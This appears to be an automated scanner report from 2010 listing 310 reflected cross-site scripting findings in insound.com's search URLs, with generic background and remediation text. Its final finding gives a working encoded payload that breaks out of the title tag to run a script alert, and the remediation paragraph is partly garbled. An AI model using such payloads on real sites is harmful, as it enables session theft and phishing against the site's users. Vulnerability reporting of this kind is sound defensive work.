insound.com | CWE-79 | XSS | Hoyt LLC Research

Cross Site Scripting, XSS, Vulnerability Crawler

Report generated by XSS.CX at Thu Dec 09 21:41:26 CST 2010.


Cross Site Scripting Report | insound.com

Loading

1. Cross-site scripting (reflected)

1.1. http://www.insound.com/search/query/Agalloch&from=47597/ [REST URL parameter 3]

1.2. http://www.insound.com/search/query/Agalloch&from=47597/ [REST URL parameter 3]

1.3. http://www.insound.com/search/query/Art%20Department&from=47597/ [REST URL parameter 3]

1.4. http://www.insound.com/search/query/Art%20Department&from=47597/ [REST URL parameter 3]

1.5. http://www.insound.com/search/query/Barbara%20Morgenstern&from=47597/ [REST URL parameter 3]

1.6. http://www.insound.com/search/query/Barbara%20Morgenstern&from=47597/ [REST URL parameter 3]

1.7. http://www.insound.com/search/query/Bjørn%20Torske&from=47597/ [REST URL parameter 3]

1.8. http://www.insound.com/search/query/Bjørn%20Torske&from=47597/ [REST URL parameter 3]

1.9. http://www.insound.com/search/query/Blank%20Dogs&from=47597/ [REST URL parameter 3]

1.10. http://www.insound.com/search/query/Blank%20Dogs&from=47597/ [REST URL parameter 3]

1.11. http://www.insound.com/search/query/Blonde%20Redhead&from=47597/ [REST URL parameter 3]

1.12. http://www.insound.com/search/query/Blonde%20Redhead&from=47597/ [REST URL parameter 3]

1.13. http://www.insound.com/search/query/Blood%20Red%20Shoes&from=47597/ [REST URL parameter 3]

1.14. http://www.insound.com/search/query/Blood%20Red%20Shoes&from=47597/ [REST URL parameter 3]

1.15. http://www.insound.com/search/query/Braids&from=47597/ [REST URL parameter 3]

1.16. http://www.insound.com/search/query/Braids&from=47597/ [REST URL parameter 3]

1.17. http://www.insound.com/search/query/Breathe%20Owl%20Breathe&from=47597/ [REST URL parameter 3]

1.18. http://www.insound.com/search/query/Breathe%20Owl%20Breathe&from=47597/ [REST URL parameter 3]

1.19. http://www.insound.com/search/query/British%20Sea%20Power&from=47597/ [REST URL parameter 3]

1.20. http://www.insound.com/search/query/British%20Sea%20Power&from=47597/ [REST URL parameter 3]

1.21. http://www.insound.com/search/query/CANT&from=47597/ [REST URL parameter 3]

1.22. http://www.insound.com/search/query/CANT&from=47597/ [REST URL parameter 3]

1.23. http://www.insound.com/search/query/CFCF&from=47597/ [REST URL parameter 3]

1.24. http://www.insound.com/search/query/CFCF&from=47597/ [REST URL parameter 3]

1.25. http://www.insound.com/search/query/Cameo&from=47597/ [REST URL parameter 3]

1.26. http://www.insound.com/search/query/Cameo&from=47597/ [REST URL parameter 3]

1.27. http://www.insound.com/search/query/Camera%20Obscura&from=47597/ [REST URL parameter 3]

1.28. http://www.insound.com/search/query/Camera%20Obscura&from=47597/ [REST URL parameter 3]

1.29. http://www.insound.com/search/query/Camp%20Lo&from=47597/ [REST URL parameter 3]

1.30. http://www.insound.com/search/query/Camp%20Lo&from=47597/ [REST URL parameter 3]

1.31. http://www.insound.com/search/query/Camper%20Van%20Beethoven&from=47597/ [REST URL parameter 3]

1.32. http://www.insound.com/search/query/Camper%20Van%20Beethoven&from=47597/ [REST URL parameter 3]

1.33. http://www.insound.com/search/query/Camper%20Van%20Chadbourne&from=47597/ [REST URL parameter 3]

1.34. http://www.insound.com/search/query/Camper%20Van%20Chadbourne&from=47597/ [REST URL parameter 3]

1.35. http://www.insound.com/search/query/Camu%20Tao&from=47597/ [REST URL parameter 3]

1.36. http://www.insound.com/search/query/Camu%20Tao&from=47597/ [REST URL parameter 3]

1.37. http://www.insound.com/search/query/Can&from=47597/ [REST URL parameter 3]

1.38. http://www.insound.com/search/query/Can&from=47597/ [REST URL parameter 3]

1.39. http://www.insound.com/search/query/Canada&from=47597/ [REST URL parameter 3]

1.40. http://www.insound.com/search/query/Canada&from=47597/ [REST URL parameter 3]

1.41. http://www.insound.com/search/query/Candace%20Pederson&from=47597/ [REST URL parameter 3]

1.42. http://www.insound.com/search/query/Candace%20Pederson&from=47597/ [REST URL parameter 3]

1.43. http://www.insound.com/search/query/Candi%20Staton&from=47597/ [REST URL parameter 3]

1.44. http://www.insound.com/search/query/Candi%20Staton&from=47597/ [REST URL parameter 3]

1.45. http://www.insound.com/search/query/Candie%20Hank&from=47597/ [REST URL parameter 3]

1.46. http://www.insound.com/search/query/Candie%20Hank&from=47597/ [REST URL parameter 3]

1.47. http://www.insound.com/search/query/Candlebox%20&from=47597/ [REST URL parameter 3]

1.48. http://www.insound.com/search/query/Candlebox%20&from=47597/ [REST URL parameter 3]

1.49. http://www.insound.com/search/query/Candlemass&from=47597/ [REST URL parameter 3]

1.50. http://www.insound.com/search/query/Candlemass&from=47597/ [REST URL parameter 3]

1.51. http://www.insound.com/search/query/Candy%20Bars&from=47597/ [REST URL parameter 3]

1.52. http://www.insound.com/search/query/Candy%20Bars&from=47597/ [REST URL parameter 3]

1.53. http://www.insound.com/search/query/Candy%20Claws&from=47597/ [REST URL parameter 3]

1.54. http://www.insound.com/search/query/Candy%20Claws&from=47597/ [REST URL parameter 3]

1.55. http://www.insound.com/search/query/Candy%20Snatchers&from=47597/ [REST URL parameter 3]

1.56. http://www.insound.com/search/query/Candy%20Snatchers&from=47597/ [REST URL parameter 3]

1.57. http://www.insound.com/search/query/Candyskins&from=47597/ [REST URL parameter 3]

1.58. http://www.insound.com/search/query/Candyskins&from=47597/ [REST URL parameter 3]

1.59. http://www.insound.com/search/query/Canned%20Heat&from=47597/ [REST URL parameter 3]

1.60. http://www.insound.com/search/query/Canned%20Heat&from=47597/ [REST URL parameter 3]

1.61. http://www.insound.com/search/query/Cannibal%20Ox&from=47597/ [REST URL parameter 3]

1.62. http://www.insound.com/search/query/Cannibal%20Ox&from=47597/ [REST URL parameter 3]

1.63. http://www.insound.com/search/query/Cansei%20De%20Ser%20Sexy&from=47597/ [REST URL parameter 3]

1.64. http://www.insound.com/search/query/Cansei%20De%20Ser%20Sexy&from=47597/ [REST URL parameter 3]

1.65. http://www.insound.com/search/query/Canyon&from=47597/ [REST URL parameter 3]

1.66. http://www.insound.com/search/query/Canyon&from=47597/ [REST URL parameter 3]

1.67. http://www.insound.com/search/query/Canyons&from=47597/ [REST URL parameter 3]

1.68. http://www.insound.com/search/query/Canyons&from=47597/ [REST URL parameter 3]

1.69. http://www.insound.com/search/query/Cap'n%20Jazz&from=47597/ [REST URL parameter 3]

1.70. http://www.insound.com/search/query/Cap'n%20Jazz&from=47597/ [REST URL parameter 3]

1.71. http://www.insound.com/search/query/Capgun%20Coup&from=47597/ [REST URL parameter 3]

1.72. http://www.insound.com/search/query/Capgun%20Coup&from=47597/ [REST URL parameter 3]

1.73. http://www.insound.com/search/query/Capillary%20Action&from=47597/ [REST URL parameter 3]

1.74. http://www.insound.com/search/query/Capillary%20Action&from=47597/ [REST URL parameter 3]

1.75. http://www.insound.com/search/query/Capitol%20City%20Dusters&from=47597/ [REST URL parameter 3]

1.76. http://www.insound.com/search/query/Capitol%20City%20Dusters&from=47597/ [REST URL parameter 3]

1.77. http://www.insound.com/search/query/Capitol%20K&from=47597/ [REST URL parameter 3]

1.78. http://www.insound.com/search/query/Capitol%20K&from=47597/ [REST URL parameter 3]

1.79. http://www.insound.com/search/query/Capleton%20&%20Jah%20Mali&from=47597/ [REST URL parameter 3]

1.80. http://www.insound.com/search/query/Capleton%20&%20Jah%20Mali&from=47597/ [REST URL parameter 3]

1.81. http://www.insound.com/search/query/Capleton&from=47597/ [REST URL parameter 3]

1.82. http://www.insound.com/search/query/Capleton&from=47597/ [REST URL parameter 3]

1.83. http://www.insound.com/search/query/Cappadonna&from=47597/ [REST URL parameter 3]

1.84. http://www.insound.com/search/query/Cappadonna&from=47597/ [REST URL parameter 3]

1.85. http://www.insound.com/search/query/Capsize%207&from=47597/ [REST URL parameter 3]

1.86. http://www.insound.com/search/query/Capsize%207&from=47597/ [REST URL parameter 3]

1.87. http://www.insound.com/search/query/Capsula&from=47597/ [REST URL parameter 3]

1.88. http://www.insound.com/search/query/Capsula&from=47597/ [REST URL parameter 3]

1.89. http://www.insound.com/search/query/Captain%20&%20Tennille&from=47597/ [REST URL parameter 3]

1.90. http://www.insound.com/search/query/Captain%20&%20Tennille&from=47597/ [REST URL parameter 3]

1.91. http://www.insound.com/search/query/Captain%20Ahab&from=47597/ [REST URL parameter 3]

1.92. http://www.insound.com/search/query/Captain%20Ahab&from=47597/ [REST URL parameter 3]

1.93. http://www.insound.com/search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/ [REST URL parameter 3]

1.94. http://www.insound.com/search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/ [REST URL parameter 3]

1.95. http://www.insound.com/search/query/Captain%20Beefheart&from=47597/ [REST URL parameter 3]

1.96. http://www.insound.com/search/query/Captain%20Beefheart&from=47597/ [REST URL parameter 3]

1.97. http://www.insound.com/search/query/Captain%20Onboard&from=47597/ [REST URL parameter 3]

1.98. http://www.insound.com/search/query/Captain%20Onboard&from=47597/ [REST URL parameter 3]

1.99. http://www.insound.com/search/query/Carabina%2030%2030&from=47597/ [REST URL parameter 3]

1.100. http://www.insound.com/search/query/Carabina%2030%2030&from=47597/ [REST URL parameter 3]

1.101. http://www.insound.com/search/query/Caralee%20McElroy&from=47597/ [REST URL parameter 3]

1.102. http://www.insound.com/search/query/Caralee%20McElroy&from=47597/ [REST URL parameter 3]

1.103. http://www.insound.com/search/query/Caramel&from=47597/ [REST URL parameter 3]

1.104. http://www.insound.com/search/query/Caramel&from=47597/ [REST URL parameter 3]

1.105. http://www.insound.com/search/query/Carbon/Silicon&from=47597/ [REST URL parameter 3]

1.106. http://www.insound.com/search/query/Carbon/Silicon&from=47597/ [REST URL parameter 3]

1.107. http://www.insound.com/search/query/Cardia&from=47597/ [REST URL parameter 3]

1.108. http://www.insound.com/search/query/Cardia&from=47597/ [REST URL parameter 3]

1.109. http://www.insound.com/search/query/Carissa's%20Wierd&from=47597/ [REST URL parameter 3]

1.110. http://www.insound.com/search/query/Carissa's%20Wierd&from=47597/ [REST URL parameter 3]

1.111. http://www.insound.com/search/query/Cassie&from=47597/ [REST URL parameter 3]

1.112. http://www.insound.com/search/query/Cassie&from=47597/ [REST URL parameter 3]

1.113. http://www.insound.com/search/query/Curren$y&from=47597/ [REST URL parameter 3]

1.114. http://www.insound.com/search/query/Curren$y&from=47597/ [REST URL parameter 3]

1.115. http://www.insound.com/search/query/D'eon&from=47597/ [REST URL parameter 3]

1.116. http://www.insound.com/search/query/D'eon&from=47597/ [REST URL parameter 3]

1.117. http://www.insound.com/search/query/DJ%20/rupture&from=47597/ [REST URL parameter 3]

1.118. http://www.insound.com/search/query/DJ%20/rupture&from=47597/ [REST URL parameter 3]

1.119. http://www.insound.com/search/query/Daft%20Punk&from=47597/ [REST URL parameter 3]

1.120. http://www.insound.com/search/query/Daft%20Punk&from=47597/ [REST URL parameter 3]

1.121. http://www.insound.com/search/query/Dark%20Dark%20Dark&from=47597/ [REST URL parameter 3]

1.122. http://www.insound.com/search/query/Dark%20Dark%20Dark&from=47597/ [REST URL parameter 3]

1.123. http://www.insound.com/search/query/Das%20Racist&from=47597/ [REST URL parameter 3]

1.124. http://www.insound.com/search/query/Das%20Racist&from=47597/ [REST URL parameter 3]

1.125. http://www.insound.com/search/query/Deerhunter&from=47597/ [REST URL parameter 3]

1.126. http://www.insound.com/search/query/Deerhunter&from=47597/ [REST URL parameter 3]

1.127. http://www.insound.com/search/query/Diamond%20Rings&from=47597/ [REST URL parameter 3]

1.128. http://www.insound.com/search/query/Diamond%20Rings&from=47597/ [REST URL parameter 3]

1.129. http://www.insound.com/search/query/Dinosaur%20Jr.&from=47597/ [REST URL parameter 3]

1.130. http://www.insound.com/search/query/Dinosaur%20Jr.&from=47597/ [REST URL parameter 3]

1.131. http://www.insound.com/search/query/Drake&from=47597/ [REST URL parameter 3]

1.132. http://www.insound.com/search/query/Drake&from=47597/ [REST URL parameter 3]

1.133. http://www.insound.com/search/query/Flying%20Lotus&from=47597/ [REST URL parameter 3]

1.134. http://www.insound.com/search/query/Flying%20Lotus&from=47597/ [REST URL parameter 3]

1.135. http://www.insound.com/search/query/Forest%20Swords&from=47597/ [REST URL parameter 3]

1.136. http://www.insound.com/search/query/Forest%20Swords&from=47597/ [REST URL parameter 3]

1.137. http://www.insound.com/search/query/Games&from=47597/ [REST URL parameter 3]

1.138. http://www.insound.com/search/query/Games&from=47597/ [REST URL parameter 3]

1.139. http://www.insound.com/search/query/Gatekeeper&from=47597/ [REST URL parameter 3]

1.140. http://www.insound.com/search/query/Gatekeeper&from=47597/ [REST URL parameter 3]

1.141. http://www.insound.com/search/query/Girl%20Talk&from=47597/ [REST URL parameter 3]

1.142. http://www.insound.com/search/query/Girl%20Talk&from=47597/ [REST URL parameter 3]

1.143. http://www.insound.com/search/query/Girls&from=47597/ [REST URL parameter 3]

1.144. http://www.insound.com/search/query/Girls&from=47597/ [REST URL parameter 3]

1.145. http://www.insound.com/search/query/Gospel%20Music&from=47597/ [REST URL parameter 3]

1.146. http://www.insound.com/search/query/Gospel%20Music&from=47597/ [REST URL parameter 3]

1.147. http://www.insound.com/search/query/Horsepower%20Productions&from=47597/ [REST URL parameter 3]

1.148. http://www.insound.com/search/query/Horsepower%20Productions&from=47597/ [REST URL parameter 3]

1.149. http://www.insound.com/search/query/How%20to%20Dress%20Well&from=47597/ [REST URL parameter 3]

1.150. http://www.insound.com/search/query/How%20to%20Dress%20Well&from=47597/ [REST URL parameter 3]

1.151. http://www.insound.com/search/query/J%20Mascis&from=47597/ [REST URL parameter 3]

1.152. http://www.insound.com/search/query/J%20Mascis&from=47597/ [REST URL parameter 3]

1.153. http://www.insound.com/search/query/J.%20Cole&from=47597/ [REST URL parameter 3]

1.154. http://www.insound.com/search/query/J.%20Cole&from=47597/ [REST URL parameter 3]

1.155. http://www.insound.com/search/query/Jana%20Hunter&from=47597/ [REST URL parameter 3]

1.156. http://www.insound.com/search/query/Jana%20Hunter&from=47597/ [REST URL parameter 3]

1.157. http://www.insound.com/search/query/John%20Talabot&from=47597/ [REST URL parameter 3]

1.158. http://www.insound.com/search/query/John%20Talabot&from=47597/ [REST URL parameter 3]

1.159. http://www.insound.com/search/query/Julio%20Bashmore&from=47597/ [REST URL parameter 3]

1.160. http://www.insound.com/search/query/Julio%20Bashmore&from=47597/ [REST URL parameter 3]

1.161. http://www.insound.com/search/query/Jónsi&from=47597/ [REST URL parameter 3]

1.162. http://www.insound.com/search/query/Jónsi&from=47597/ [REST URL parameter 3]

1.163. http://www.insound.com/search/query/Kanye%20West&from=47597/ [REST URL parameter 3]

1.164. http://www.insound.com/search/query/Kanye%20West&from=47597/ [REST URL parameter 3]

1.165. http://www.insound.com/search/query/Kingdom&from=47597/ [REST URL parameter 3]

1.166. http://www.insound.com/search/query/Kingdom&from=47597/ [REST URL parameter 3]

1.167. http://www.insound.com/search/query/Koen%20Holtkamp&from=47597/ [REST URL parameter 3]

1.168. http://www.insound.com/search/query/Koen%20Holtkamp&from=47597/ [REST URL parameter 3]

1.169. http://www.insound.com/search/query/LCD%20Soundsystem&from=47597/ [REST URL parameter 3]

1.170. http://www.insound.com/search/query/LCD%20Soundsystem&from=47597/ [REST URL parameter 3]

1.171. http://www.insound.com/search/query/Les%20Sins&from=47597/ [REST URL parameter 3]

1.172. http://www.insound.com/search/query/Les%20Sins&from=47597/ [REST URL parameter 3]

1.173. http://www.insound.com/search/query/Los%20Campesinos!&from=47597/ [REST URL parameter 3]

1.174. http://www.insound.com/search/query/Los%20Campesinos!&from=47597/ [REST URL parameter 3]

1.175. http://www.insound.com/search/query/Lower%20Dens&from=47597/ [REST URL parameter 3]

1.176. http://www.insound.com/search/query/Lower%20Dens&from=47597/ [REST URL parameter 3]

1.177. http://www.insound.com/search/query/Lunice&from=47597/ [REST URL parameter 3]

1.178. http://www.insound.com/search/query/Lunice&from=47597/ [REST URL parameter 3]

1.179. http://www.insound.com/search/query/Lyrics%20Born&from=47597/ [REST URL parameter 3]

1.180. http://www.insound.com/search/query/Lyrics%20Born&from=47597/ [REST URL parameter 3]

1.181. http://www.insound.com/search/query/Mark%20McGuire&from=47597/ [REST URL parameter 3]

1.182. http://www.insound.com/search/query/Mark%20McGuire&from=47597/ [REST URL parameter 3]

1.183. http://www.insound.com/search/query/Matt%20Shadetek&from=47597/ [REST URL parameter 3]

1.184. http://www.insound.com/search/query/Matt%20Shadetek&from=47597/ [REST URL parameter 3]

1.185. http://www.insound.com/search/query/Matthew%20Dear&from=47597/ [REST URL parameter 3]

1.186. http://www.insound.com/search/query/Matthew%20Dear&from=47597/ [REST URL parameter 3]

1.187. http://www.insound.com/search/query/Miko&from=47597/ [REST URL parameter 3]

1.188. http://www.insound.com/search/query/Miko&from=47597/ [REST URL parameter 3]

1.189. http://www.insound.com/search/query/Nate%20Query&from=47597/ [REST URL parameter 3]

1.190. http://www.insound.com/search/query/Nate%20Query&from=47597/ [REST URL parameter 3]

1.191. http://www.insound.com/search/query/Nate%20Ruth&from=47597/ [REST URL parameter 3]

1.192. http://www.insound.com/search/query/Nate%20Ruth&from=47597/ [REST URL parameter 3]

1.193. http://www.insound.com/search/query/Nathalie%20Nordnes&from=47597/ [REST URL parameter 3]

1.194. http://www.insound.com/search/query/Nathalie%20Nordnes&from=47597/ [REST URL parameter 3]

1.195. http://www.insound.com/search/query/Nathan%20Delfs&from=47597/ [REST URL parameter 3]

1.196. http://www.insound.com/search/query/Nathan%20Delfs&from=47597/ [REST URL parameter 3]

1.197. http://www.insound.com/search/query/Nathan%20Fake&from=47597/ [REST URL parameter 3]

1.198. http://www.insound.com/search/query/Nathan%20Fake&from=47597/ [REST URL parameter 3]

1.199. http://www.insound.com/search/query/Nathan%20Larson&from=47597/ [REST URL parameter 3]

1.200. http://www.insound.com/search/query/Nathan%20Larson&from=47597/ [REST URL parameter 3]

1.201. http://www.insound.com/search/query/Nathan%20Michel&from=47597/ [REST URL parameter 3]

1.202. http://www.insound.com/search/query/Nathan%20Michel&from=47597/ [REST URL parameter 3]

1.203. http://www.insound.com/search/query/Nathaniel%20Rateliff%20&from=47597/ [REST URL parameter 3]

1.204. http://www.insound.com/search/query/Nathaniel%20Rateliff%20&from=47597/ [REST URL parameter 3]

1.205. http://www.insound.com/search/query/Nation%20of%20Ulysses&from=47597/ [REST URL parameter 3]

1.206. http://www.insound.com/search/query/Nation%20of%20Ulysses&from=47597/ [REST URL parameter 3]

1.207. http://www.insound.com/search/query/National%20Eye&from=47597/ [REST URL parameter 3]

1.208. http://www.insound.com/search/query/National%20Eye&from=47597/ [REST URL parameter 3]

1.209. http://www.insound.com/search/query/National%20Skyline&from=47597/ [REST URL parameter 3]

1.210. http://www.insound.com/search/query/National%20Skyline&from=47597/ [REST URL parameter 3]

1.211. http://www.insound.com/search/query/Nationale%20Blue&from=47597/ [REST URL parameter 3]

1.212. http://www.insound.com/search/query/Nationale%20Blue&from=47597/ [REST URL parameter 3]

1.213. http://www.insound.com/search/query/Nations%20by%20the%20River&from=47597/ [REST URL parameter 3]

1.214. http://www.insound.com/search/query/Nations%20by%20the%20River&from=47597/ [REST URL parameter 3]

1.215. http://www.insound.com/search/query/Native%20Fauna&from=47597/ [REST URL parameter 3]

1.216. http://www.insound.com/search/query/Native%20Fauna&from=47597/ [REST URL parameter 3]

1.217. http://www.insound.com/search/query/Native&from=47597/ [REST URL parameter 3]

1.218. http://www.insound.com/search/query/Native&from=47597/ [REST URL parameter 3]

1.219. http://www.insound.com/search/query/Natural%20Calamity&from=47597/ [REST URL parameter 3]

1.220. http://www.insound.com/search/query/Natural%20Calamity&from=47597/ [REST URL parameter 3]

1.221. http://www.insound.com/search/query/Neon%20Indian&from=47597/ [REST URL parameter 3]

1.222. http://www.insound.com/search/query/Neon%20Indian&from=47597/ [REST URL parameter 3]

1.223. http://www.insound.com/search/query/Nicki%20Minaj&from=47597/ [REST URL parameter 3]

1.224. http://www.insound.com/search/query/Nicki%20Minaj&from=47597/ [REST URL parameter 3]

1.225. http://www.insound.com/search/query/Nico%20Muhly&from=47597/ [REST URL parameter 3]

1.226. http://www.insound.com/search/query/Nico%20Muhly&from=47597/ [REST URL parameter 3]

1.227. http://www.insound.com/search/query/Nightlands&from=47597/ [REST URL parameter 3]

1.228. http://www.insound.com/search/query/Nightlands&from=47597/ [REST URL parameter 3]

1.229. http://www.insound.com/search/query/Nine%20Inch%20Nails&from=47597/ [REST URL parameter 3]

1.230. http://www.insound.com/search/query/Nine%20Inch%20Nails&from=47597/ [REST URL parameter 3]

1.231. http://www.insound.com/search/query/No%20Age&from=47597/ [REST URL parameter 3]

1.232. http://www.insound.com/search/query/No%20Age&from=47597/ [REST URL parameter 3]

1.233. http://www.insound.com/search/query/OFF!&from=47597/ [REST URL parameter 3]

1.234. http://www.insound.com/search/query/OFF!&from=47597/ [REST URL parameter 3]

1.235. http://www.insound.com/search/query/Orange%20Juice&from=47597/ [REST URL parameter 3]

1.236. http://www.insound.com/search/query/Orange%20Juice&from=47597/ [REST URL parameter 3]

1.237. http://www.insound.com/search/query/PJ%20Harvey&from=47597/ [REST URL parameter 3]

1.238. http://www.insound.com/search/query/PJ%20Harvey&from=47597/ [REST URL parameter 3]

1.239. http://www.insound.com/search/query/Perfume%20Genius&from=47597/ [REST URL parameter 3]

1.240. http://www.insound.com/search/query/Perfume%20Genius&from=47597/ [REST URL parameter 3]

1.241. http://www.insound.com/search/query/Purling%20Hiss&from=47597/ [REST URL parameter 3]

1.242. http://www.insound.com/search/query/Purling%20Hiss&from=47597/ [REST URL parameter 3]

1.243. http://www.insound.com/search/query/Raekwon&from=47597/ [REST URL parameter 3]

1.244. http://www.insound.com/search/query/Raekwon&from=47597/ [REST URL parameter 3]

1.245. http://www.insound.com/search/query/Residual%20Echoes&from=47597/ [REST URL parameter 3]

1.246. http://www.insound.com/search/query/Residual%20Echoes&from=47597/ [REST URL parameter 3]

1.247. http://www.insound.com/search/query/Rihanna&from=47597/ [REST URL parameter 3]

1.248. http://www.insound.com/search/query/Rihanna&from=47597/ [REST URL parameter 3]

1.249. http://www.insound.com/search/query/Rita%20Indiana&from=47597/ [REST URL parameter 3]

1.250. http://www.insound.com/search/query/Rita%20Indiana&from=47597/ [REST URL parameter 3]

1.251. http://www.insound.com/search/query/Robert%20Wyatt&from=47597/ [REST URL parameter 3]

1.252. http://www.insound.com/search/query/Robert%20Wyatt&from=47597/ [REST URL parameter 3]

1.253. http://www.insound.com/search/query/Robyn&from=47597/ [REST URL parameter 3]

1.254. http://www.insound.com/search/query/Robyn&from=47597/ [REST URL parameter 3]

1.255. http://www.insound.com/search/query/Shit%20Robot&from=47597/ [REST URL parameter 3]

1.256. http://www.insound.com/search/query/Shit%20Robot&from=47597/ [REST URL parameter 3]

1.257. http://www.insound.com/search/query/Simian%20Mobile%20Disco&from=47597/ [REST URL parameter 3]

1.258. http://www.insound.com/search/query/Simian%20Mobile%20Disco&from=47597/ [REST URL parameter 3]

1.259. http://www.insound.com/search/query/Soft%20Circle&from=47597/ [REST URL parameter 3]

1.260. http://www.insound.com/search/query/Soft%20Circle&from=47597/ [REST URL parameter 3]

1.261. http://www.insound.com/search/query/Spectrals&from=47597/ [REST URL parameter 3]

1.262. http://www.insound.com/search/query/Spectrals&from=47597/ [REST URL parameter 3]

1.263. http://www.insound.com/search/query/Spoon&from=47597/ [REST URL parameter 3]

1.264. http://www.insound.com/search/query/Spoon&from=47597/ [REST URL parameter 3]

1.265. http://www.insound.com/search/query/Sufjan%20Stevens&from=47597/ [REST URL parameter 3]

1.266. http://www.insound.com/search/query/Sufjan%20Stevens&from=47597/ [REST URL parameter 3]

1.267. http://www.insound.com/search/query/Super%20Wild%20Horses&from=47597/ [REST URL parameter 3]

1.268. http://www.insound.com/search/query/Super%20Wild%20Horses&from=47597/ [REST URL parameter 3]

1.269. http://www.insound.com/search/query/Tanlines&from=47597/ [REST URL parameter 3]

1.270. http://www.insound.com/search/query/Tanlines&from=47597/ [REST URL parameter 3]

1.271. http://www.insound.com/search/query/Telekinesis&from=47597/ [REST URL parameter 3]

1.272. http://www.insound.com/search/query/Telekinesis&from=47597/ [REST URL parameter 3]

1.273. http://www.insound.com/search/query/Tennis&from=47597/ [REST URL parameter 3]

1.274. http://www.insound.com/search/query/Tennis&from=47597/ [REST URL parameter 3]

1.275. http://www.insound.com/search/query/The%20Bug&from=47597/ [REST URL parameter 3]

1.276. http://www.insound.com/search/query/The%20Bug&from=47597/ [REST URL parameter 3]

1.277. http://www.insound.com/search/query/The%20Cannabinoids&from=47597/ [REST URL parameter 3]

1.278. http://www.insound.com/search/query/The%20Cannabinoids&from=47597/ [REST URL parameter 3]

1.279. http://www.insound.com/search/query/The%20Cannanes&from=47597/ [REST URL parameter 3]

1.280. http://www.insound.com/search/query/The%20Cannanes&from=47597/ [REST URL parameter 3]

1.281. http://www.insound.com/search/query/The%20Cannonball%20Adderley%20Quintet&from=47597/ [REST URL parameter 3]

1.282. http://www.insound.com/search/query/The%20Cannonball%20Adderley%20Quintet&from=47597/ [REST URL parameter 3]

1.283. http://www.insound.com/search/query/The%20Cansecos&from=47597/ [REST URL parameter 3]

1.284. http://www.insound.com/search/query/The%20Cansecos&from=47597/ [REST URL parameter 3]

1.285. http://www.insound.com/search/query/The%20Capes&from=47597/ [REST URL parameter 3]

1.286. http://www.insound.com/search/query/The%20Capes&from=47597/ [REST URL parameter 3]

1.287. http://www.insound.com/search/query/The%20Capitol%20Years&from=47597/ [REST URL parameter 3]

1.288. http://www.insound.com/search/query/The%20Capitol%20Years&from=47597/ [REST URL parameter 3]

1.289. http://www.insound.com/search/query/The%20Capstan%20Shafts&from=47597/ [REST URL parameter 3]

1.290. http://www.insound.com/search/query/The%20Capstan%20Shafts&from=47597/ [REST URL parameter 3]

1.291. http://www.insound.com/search/query/The%20Drums&from=47597/ [REST URL parameter 3]

1.292. http://www.insound.com/search/query/The%20Drums&from=47597/ [REST URL parameter 3]

1.293. http://www.insound.com/search/query/The%20Mountain%20Goats&from=47597/ [REST URL parameter 3]

1.294. http://www.insound.com/search/query/The%20Mountain%20Goats&from=47597/ [REST URL parameter 3]

1.295. http://www.insound.com/search/query/The%20National%20Lights&from=47597/ [REST URL parameter 3]

1.296. http://www.insound.com/search/query/The%20National%20Lights&from=47597/ [REST URL parameter 3]

1.297. http://www.insound.com/search/query/The%20National%20Trust&from=47597/ [REST URL parameter 3]

1.298. http://www.insound.com/search/query/The%20National%20Trust&from=47597/ [REST URL parameter 3]

1.299. http://www.insound.com/search/query/The%20National&from=47597/ [REST URL parameter 3]

1.300. http://www.insound.com/search/query/The%20National&from=47597/ [REST URL parameter 3]

1.301. http://www.insound.com/search/query/The%20Soft%20Boys&from=47597/ [REST URL parameter 3]

1.302. http://www.insound.com/search/query/The%20Soft%20Boys&from=47597/ [REST URL parameter 3]

1.303. http://www.insound.com/search/query/The%20War%20on%20Drugs&from=47597/ [REST URL parameter 3]

1.304. http://www.insound.com/search/query/The%20War%20on%20Drugs&from=47597/ [REST URL parameter 3]

1.305. http://www.insound.com/search/query/Trans%20Am&from=47597/ [REST URL parameter 3]

1.306. http://www.insound.com/search/query/Trans%20Am&from=47597/ [REST URL parameter 3]

1.307. http://www.insound.com/search/query/Twin%20Shadow&from=47597/ [REST URL parameter 3]

1.308. http://www.insound.com/search/query/Twin%20Shadow&from=47597/ [REST URL parameter 3]

1.309. http://www.insound.com/search/query/Wise%20Blood&from=47597/ [REST URL parameter 3]

1.310. http://www.insound.com/search/query/Wise%20Blood&from=47597/ [REST URL parameter 3]

2. Cookie scoped to parent domain

3. Cookie without HttpOnly flag set

4. Cross-domain script include



1. Cross-site scripting (reflected)  next
There are 310 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.insound.com/search/query/Agalloch&from=47597/ [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Agalloch&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f2346%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17419aa4d55 was submitted in the REST URL parameter 3. This input was echoed as f2346</title><script>alert(1)</script>17419aa4d55 in the application's response.

